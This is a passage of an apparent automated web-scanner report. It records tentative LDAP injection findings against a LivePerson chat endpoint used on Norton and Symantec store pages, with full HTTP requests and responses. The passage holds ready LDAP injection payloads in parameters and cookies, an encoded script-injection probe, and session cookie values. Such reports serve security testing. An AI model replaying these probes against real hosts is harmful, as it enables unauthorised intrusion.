Last-Modified: Fri, 09 Sep 2011 21:37:50 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"243824564852-218836609740","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

1.6. http://sales.liveperson.net/hc/2735064/ [lpCallId parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/2735064/

Issue detail

The lpCallId parameter appears to be vulnerable to LDAP injection attacks.

The payloads 93a3bb2cb00a26ff)(sn=* and 93a3bb2cb00a26ff)!(sn=* were each submitted in the lpCallId parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=93a3bb2cb00a26ff)(sn=*&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:33:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:33:31 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:33:31 GMT; path=/hc/2735064; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 84

lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});

Request 2

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=93a3bb2cb00a26ff)!(sn=*&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:33:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:33:32 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 84

lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});

1.7. http://sales.liveperson.net/hc/71097838/ [HumanClickACTIVE cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/71097838/

Issue detail

The HumanClickACTIVE cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the HumanClickACTIVE cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagInviteShown&lpCallId=466950613539-178177123656&protV=20&lpjson=1&page=http%3A//www.symantec.com/store/products/index.jsp%3Finid%3Dus_pagenotfound_smb_store&id=9383966153&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Store%20Shop%20Products%20-%20Symantec%20Corp.&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/store/products/index.jsp?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=*)(sn=*

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:34:47 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; expires=Sat, 08-Sep-2012 21:34:47 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 343

lpConnLib.Process({"ResultSet": {"lpCallId":"466950613539-178177123656","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

Request 2

GET /hc/71097838/?&site=71097838&cmd=mTagInviteShown&lpCallId=466950613539-178177123656&protV=20&lpjson=1&page=http%3A//www.symantec.com/store/products/index.jsp%3Finid%3Dus_pagenotfound_smb_store&id=9383966153&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Store%20Shop%20Products%20-%20Symantec%20Corp.&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/store/products/index.jsp?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=*)!(sn=*

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:34:49 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 343

lpConnLib.Process({"ResultSet": {"lpCallId":"466950613539-178177123656","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

1.8. http://sales.liveperson.net/hc/71097838/ [HumanClickSiteContainerID_71097838 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/71097838/

Issue detail

The HumanClickSiteContainerID_71097838 cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the HumanClickSiteContainerID_71097838 cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagInPage&lpCallId=465838986914-760230379877&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:-1:-1:-1; HumanClickSiteContainerID_71097838=*)(sn=*; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603879317

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:33:40 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; expires=Sat, 08-Sep-2012 21:33:40 GMT; path=/hc/71097838; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:33:40 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"465838986914-760230379877","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

Request 2

GET /hc/71097838/?&site=71097838&cmd=mTagInPage&lpCallId=465838986914-760230379877&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:-1:-1:-1; HumanClickSiteContainerID_71097838=*)!(sn=*; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603879317

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:33:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:33:41 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"465838986914-760230379877","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

1.9. http://sales.liveperson.net/hc/71097838/ [lpCallId parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/71097838/

Issue detail

The lpCallId parameter appears to be vulnerable to LDAP injection attacks.

The payloads 92b3a3f88ff05d96)(sn=* and 92b3a3f88ff05d96)!(sn=* were each submitted in the lpCallId parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagStartPage&lpCallId=92b3a3f88ff05d96)(sn=*&protV=20&lpjson=1&page=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps6ed59%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E0e8182bf4be&id=9609075416&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-business-english&activePlugin=none&cobrowse=true&PV%21unit=sales-business&PV%21Section=Products&PV%21BusinessPageCategory=Overview&PV%21ProductFamily=Information%20Risk%20%26%20Compliance&PV%21ProductName=VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&PV%21ProductId=fds&PV%21pageLoadTime=2%20sec&PV%21visitorActive=1&SV%21language=english&SV%21MarketTier=&title=Risk-Based%20Authentication%2C%20Fraud%20Detection%2C%20Identity%20Theft%20Protection%20-%20VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&referrer=http%3A//burp/show/2&cookie=s_vi%3D%5BCS%5Dv1%7C2735422985161DC5-600001A3801B01DD%5BCE%5D%3B%20IS3_History%3D0-0-0____%3B%20IS3_GSV%3DDPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20s_pers%3D%2520s_nr%253D1315621972496-New%257C1336357972496%253B%2520event69%253Devent69%257C1336357972499%253B%3B%20s_sess%3D%2520s_sv_sid%253D806960442771%253B%2520s_cc%253Dtrue%253B%2520s_sq%253D%253B%3B%20s_sv_112_s1%3D1@16@a//1315621570007%3B%20s_sv_112_p1%3D1@25@s/6036/5742/5736/5417%26e/9 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:34:23 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Secondary1; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315604062:-1:1315604022:-1:-1; expires=Sat, 08-Sep-2012 21:34:23 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 84

lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});

Request 2

GET /hc/71097838/?&site=71097838&cmd=mTagStartPage&lpCallId=92b3a3f88ff05d96)!(sn=*&protV=20&lpjson=1&page=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps6ed59%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E0e8182bf4be&id=9609075416&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-business-english&activePlugin=none&cobrowse=true&PV%21unit=sales-business&PV%21Section=Products&PV%21BusinessPageCategory=Overview&PV%21ProductFamily=Information%20Risk%20%26%20Compliance&PV%21ProductName=VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&PV%21ProductId=fds&PV%21pageLoadTime=2%20sec&PV%21visitorActive=1&SV%21language=english&SV%21MarketTier=&title=Risk-Based%20Authentication%2C%20Fraud%20Detection%2C%20Identity%20Theft%20Protection%20-%20VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&referrer=http%3A//burp/show/2&cookie=s_vi%3D%5BCS%5Dv1%7C2735422985161DC5-600001A3801B01DD%5BCE%5D%3B%20IS3_History%3D0-0-0____%3B%20IS3_GSV%3DDPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20s_pers%3D%2520s_nr%253D1315621972496-New%257C1336357972496%253B%2520event69%253Devent69%257C1336357972499%253B%3B%20s_sess%3D%2520s_sv_sid%253D806960442771%253B%2520s_cc%253Dtrue%253B%2520s_sq%253D%253B%3B%20s_sv_112_s1%3D1@16@a//1315621570007%3B%20s_sv_112_p1%3D1@25@s/6036/5742/5736/5417%26e/9 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:34:24 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Secondary1; path=/hc/71097838
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 84

lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});

1.10. http://sales.liveperson.net/hc/71097838/ [protV parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/71097838/

Issue detail

The protV parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the protV parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=*)(sn=*&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:35:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:35:23 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315604120:-1:1315604070:-1:-1; expires=Sat, 08-Sep-2012 21:35:23 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

Request 2

GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=*)!(sn=*&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:35:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:35:24 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 427

lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

1.11. http://sales.liveperson.net/hc/71097838/ [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sales.liveperson.net
Path:   /hc/71097838/

Issue detail

The t parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the t parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=*)(sn=* HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
